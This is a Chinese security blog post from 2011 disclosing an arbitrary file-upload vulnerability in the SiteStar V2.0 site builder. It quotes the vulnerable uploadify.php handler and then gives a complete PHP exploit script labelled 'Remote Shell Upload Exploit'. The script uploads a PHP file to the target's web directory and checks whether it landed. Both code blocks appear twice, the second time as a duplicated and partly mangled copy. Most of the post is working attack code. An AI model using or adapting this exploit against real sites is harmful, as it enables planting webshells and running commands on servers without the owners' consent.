建站之星SiteStar V2.0 上传漏洞

2011-10-24 21:11 作者: 诗人博客来源: 本站浏览: 3,279 views 我要评论字号: 大中小

漏洞程序：建站之星（SiteStar）

漏洞作者：cnryan

SiteStar V2.0没有正确限制文件的上传，远程攻击者可能利用此漏洞上传任意文件到Web目录，最终导致在服务器上执行任意命令。
漏洞产生在 /script/multiupload/uploadify.php文件：

<?php
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
// 解决Windows中文文件名乱码
if (preg_match("/^WIN/i", PHP_OS)) {
$targetFile = iconv('UTF-8', 'GBK', $targetFile);
}
move_uploaded_file($tempFile, $targetFile);
echo "1";
}
?>
没什么好说的，低级失误。通过构造html表单可直接上传webshell至web目录，下面提供一段测试代码。EXP：
<?
print_r('
+---------------------------------------------------------------------------+
SiteStar V2.0 Remote Shell Upload Exploit
+---------------------------------------------------------------------------+
');
if ($argc < 3)
{
print " Usage: php $argv[0] host path ";
print "Example: php $argv[0] localhost /sitestar/ ";
die();
}
error_reporting(0);
set_time_limit(0);
$host = $argv[1];
$path = $argv[2];
$shell = 'http://'.$host.$path.'cnryan.php';
$payload = "-----cnryan ";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\" ";
$payload .= "Content-Type: application/octet-stream ";
$payload .= "<?php phpinfo();?>W.S.T -----cnryan ";
$payload .= "Content-Disposition: form-data; name=\"upload\" ";
$payload .= "-----cnryan ";
$payload .= "Content-Disposition: form-data; name=\"folder\" ";
$payload .= "$path ";
$payload .= "-----cnryan--";
$packet = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0 ";
$packet .= "Host: {$host} ";
$packet .= "Connection: keep-alive ";
$packet .= "Content-Type: multipart/form-data; boundary=---cnryan ";
$packet .= "Content-Length: ".strlen($payload)." ";
$packet .= $payload;
$fp = fsockopen($host, 80);
fputs($fp, $packet);
sleep(5);
$str=file_get_contents($shell);
if(strpos($str,'W.S.T'))
exit("OK! Got shell:\t$shell ");
else
exit("Exploit Failed! ");
?>

<?php

if (!empty($_FILES)) {

$tempFile = $_FILES['Filedata']['tmp_name'];

$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';

$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

// 解决Windows中文文件名乱码

if (preg_match("/^WIN/i", PHP_OS)) {

$targetFile = iconv('UTF-8', 'GBK', $targetFile);

}

move_uploaded_file($tempFile, $targetFile);

echo "1";

}

没什么好说的，低级失误。通过构造html表单可直接上传webshell至web目录，下面提供一段测试代码。EXP：

print_r('

+---------------------------------------------------------------------------+

SiteStar V2.0 Remote Shell Upload Exploit

+---------------------------------------------------------------------------+

');

if ($argc < 3)

{

print " Usage: php $argv[0] host path ";

print "Example: php $argv[0] localhost /sitestar/ ";

die();

}

error_reporting(0);

set_time_limit(0);

$host = $argv[1];

$path = $argv[2];

$shell = 'http://'.$host.$path.'cnryan.php';

$payload = "-----cnryan ";

$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\" ";

$payload .= "Content-Type: application/octet-stream ";

$payload .= "<?php phpinfo();?>W.S.T -----cnryan ";

$payload .= "Content-Disposition: form-data; name=\"upload\" ";

$payload .= "-----cnryan ";

$payload .= "Content-Disposition: form-data; name=\"folder\" ";

$payload .= "$path ";

$payload .= "-----cnryan--";

$packet = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0 ";

$packet .= "Host: {$host} ";

$packet .= "Connection: keep-alive ";

$packet .= "Content-Type: multipart/form-data; boundary=---cnryan ";

$packet .= "Content-Length: ".strlen($payload)." ";

$packet .= $payload;

$fp = fsockopen($host, 80);

fputs($fp, $packet);

sleep(5);

$str=file_get_contents($shell);

if(strpos($str,'W.S.T'))

exit("OK! Got shell:\t$shell ");

else

exit("Exploit Failed! ");

打印

分享到：

复制链接

上一篇: 建站之星sitestar V1.3 通杀0day

下一篇: office2010各版本密钥

建站之星SiteStar V2.0 上传漏洞

随机推荐

发表评论

会员登录关闭

注册会员关闭

最多关注全部本月本周

分类目录

随机文章

广而告之

建站之星SiteStar V2.0 上传漏洞

扫描二维码手机访问

相关阅读

随机推荐

发表评论

会员登录关闭

注册会员关闭

最多关注全部本月本周

分类目录

随机文章

标签云

广而告之